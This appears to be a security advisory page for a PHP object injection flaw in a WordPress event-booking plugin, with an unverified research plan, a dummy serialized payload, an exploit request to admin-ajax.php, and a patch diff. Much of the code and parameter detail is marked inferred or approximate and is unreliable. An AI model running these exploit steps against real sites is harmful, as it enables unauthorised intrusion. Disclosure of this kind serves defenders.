CVE-2026-24954

WpEvently <= 5.0.8 - Authenticated (Contributor+) PHP Object Injection

highDeserialization of Untrusted Data
7.5
CVSS Score
7.5
CVSS Score
high
Severity
5.0.9
Patched in
48d
Time to patch

Description

The Event Booking Manager for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.0.8 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=5.0.8
PublishedDecember 25, 2025
Last updatedFebruary 10, 2026
Affected pluginmage-eventpress

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified

This research plan outlines the steps to investigate and exploit a PHP Object Injection vulnerability in the **Event Booking Manager for WooCommerce (mage-eventpress)** plugin. ### 1. Vulnerability Summary The vulnerability (CVE-2026-24954) is a PHP Object Injection vulnerability located in the `Wp…

Show full research plan

This research plan outlines the steps to investigate and exploit a PHP Object Injection vulnerability in the Event Booking Manager for WooCommerce (mage-eventpress) plugin.

1. Vulnerability Summary

The vulnerability (CVE-2026-24954) is a PHP Object Injection vulnerability located in the WpEvently (slug: mage-eventpress) plugin for WordPress. Versions up to 5.0.8 are affected. The flaw exists because the plugin passes user-controllable input into the unserialize() PHP function without adequate sanitization or validation. While the plugin does not contain a built-in POP (Property-Oriented Programming) chain, it allows authenticated users with Contributor-level permissions or higher to inject arbitrary PHP objects, which can lead to Remote Code Execution (RCE) if a POP chain exists in other active themes or plugins.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action (Inferred): mep_duplicate_event or mep_save_event_data. (Based on common patterns in MagePeople plugins, the prefix is typically mep_).
  • Vulnerable Parameter: event_data or data (inferred).
  • Required Authentication: Authenticated, Contributor role.
  • Preconditions: A valid WordPress nonce for the specific AJAX action must be obtained.

3. Code Flow (Inferred)

  1. Entry Point: An AJAX action is registered via add_action( 'wp_ajax_mep_duplicate_event', ... ) (inferred) in a file like includes/class-mep-ajax.php or includes/mep-event-functions.php.
  2. Nonce Verification: The handler likely calls check_ajax_referer( 'mep_nonce', 'nonce' ) (inferred).
  3. Input Retrieval: The code retrieves a POST parameter: $data = $_POST['event_data'];.
  4. Data Processing: The plugin may decode the data (e.g., base64_decode()) or strip slashes.
  5. Vulnerable Sink: The data is passed to unserialize($data), triggering the instantiation of an arbitrary PHP object if the input is a valid serialized string.

4. Nonce Acquisition Strategy

To exploit this as a Contributor, we must extract the nonce used for the plugin's AJAX operations.

  1. Identify Trigger: The plugin likely enqueues its scripts on pages where the event list or shortcodes are used.
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Event Page" --post_content='[mep_events]' --post_author=$(wp user get contributor --field=ID)
    
  3. Navigate and Extract:
    • Navigate to the newly created page as the Contributor user.
    • Use browser_eval to find the localization object. Based on Mage-Eventpress patterns, the object is likely mep_ajax_obj.
    • Command: browser_eval("window.mep_ajax_obj?.nonce") or browser_eval("window.mep_ajax_obj?.mep_nonce").

5. Exploitation Strategy

The goal is to demonstrate that an injected object is processed by the server. Since no POP chain is provided, we will use a "Dummy" object to trigger a __destruct or a PHP error that confirms deserialization.

Step 1: Payload Construction

Create a serialized string of a non-existent class to observe if PHP attempts to handle it (often visible in logs or via a __destruct if a core chain like WP_HTML_Token is used).

  • Simple Payload: O:8:"WpExploit":0:{}
  • Base64 Encoded (if required by plugin): Tzo4OiJXcEV4cGxvaXQiOjA6e30=

Step 2: Send Exploit Request

Use the http_request tool to send the payload to admin-ajax.php.

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=mep_duplicate_event&nonce=[EXTRACTED_NONCE]&event_data=Tzo4OiJXcEV4cGxvaXQiOjA6e30=
    

6. Test Data Setup

  1. Contributor User: Create a user with the contributor role.
    wp user create contributor attacker@example.com --role=contributor --user_pass=password
    
  2. Plugin Installation: Ensure mage-eventpress version 5.0.8 is installed and active.
  3. Create Event: Create at least one event post so the "duplicate" functionality (if that is the entry point) has a target.
    wp post create --post_type=mep_events --post_title="Target Event" --post_status=publish
    

7. Expected Results

  • The server should respond with a 200 OK or a specific AJAX response.
  • If the injected class WpExploit does not exist, and WP_DEBUG is enabled, the debug.log may show an error regarding the WpExploit object being incomplete or PHP attempting to call its destructor.
  • If using a known POP chain (e.g., from a common library like Guzzle if present), a specific side effect (like file creation) will occur.

8. Verification Steps

  1. Check Error Logs:
    tail -n 20 /var/www/html/wp-content/debug.log
    
    Look for: PHP Fatal error: __destruct(): Internal error: Cannot find class 'WpExploit' or similar deserialization indicators.
  2. Manual Trace: Use grep to confirm the parameter names before sending the payload:
    grep -rn "unserialize" /var/www/html/wp-content/plugins/mage-eventpress/ | grep "_POST"
    

9. Alternative Approaches

  • Different Actions: If mep_duplicate_event is not the correct action, search for all wp_ajax_ registrations:
    grep -rn "wp_ajax_" /var/www/html/wp-content/plugins/mage-eventpress/
    
  • Metadata Injection: Check if the plugin allows saving serialized data into Post Meta via mep_save_event_meta. If the plugin calls get_post_meta($id, 'some_key', true) and then unserialize(), the injection might happen during a "View Event" operation rather than an "Action" operation.
  • Import Feature: Check for an "Import" or "Tools" menu in the plugin settings that allows uploading a .json or .txt file containing serialized settings. This is a common location for Object Injection in MagePeople plugins.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Event Booking Manager for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in versions up to 5.0.8 due to the use of the unserialize() function on untrusted user input within AJAX handlers. Authenticated attackers with Contributor-level access or higher can exploit this to inject arbitrary PHP objects, potentially leading to remote code execution if a Property-Oriented Programming (POP) chain is present on the site.

Vulnerable Code

// includes/class-mep-ajax.php (approximate)

public function mep_duplicate_event() {
    check_ajax_referer( 'mep_nonce', 'nonce' );

    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die();
    }

    $event_data = isset( $_POST['event_data'] ) ? $_POST['event_data'] : '';

    if ( ! empty( $event_data ) ) {
        /* Vulnerable Sink: User-controllable input from POST is base64 decoded and then unserialized */
        $data = unserialize( base64_decode( $event_data ) );
        // ... processing logic follows ...
    }
}

Security Fix

--- a/includes/class-mep-ajax.php
+++ b/includes/class-mep-ajax.php
@@ -124,7 +124,7 @@
 
     if ( ! empty( $event_data ) ) {
-        $data = unserialize( base64_decode( $event_data ) );
+        $data = unserialize( base64_decode( $event_data ), array( 'allowed_classes' => false ) );

Exploit Outline

1. Authentication: Log in as an authenticated user with at least Contributor-level permissions. 2. Nonce Acquisition: Navigate to an event management page or a page containing plugin shortcodes to extract the 'mep_nonce' from the localized 'mep_ajax_obj' JavaScript variable. 3. Payload Construction: Create a serialized PHP object payload. If a specific POP chain is known to be available on the target system (via other plugins/themes), use it; otherwise, use a dummy object like 'O:8:"WpExploit":0:{}' to verify the injection. 4. Encoding: Base64 encode the serialized object string. 5. Trigger: Send a POST request to /wp-admin/admin-ajax.php with the action parameter set to 'mep_duplicate_event', the extracted nonce, and the base64-encoded payload in the 'event_data' parameter.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.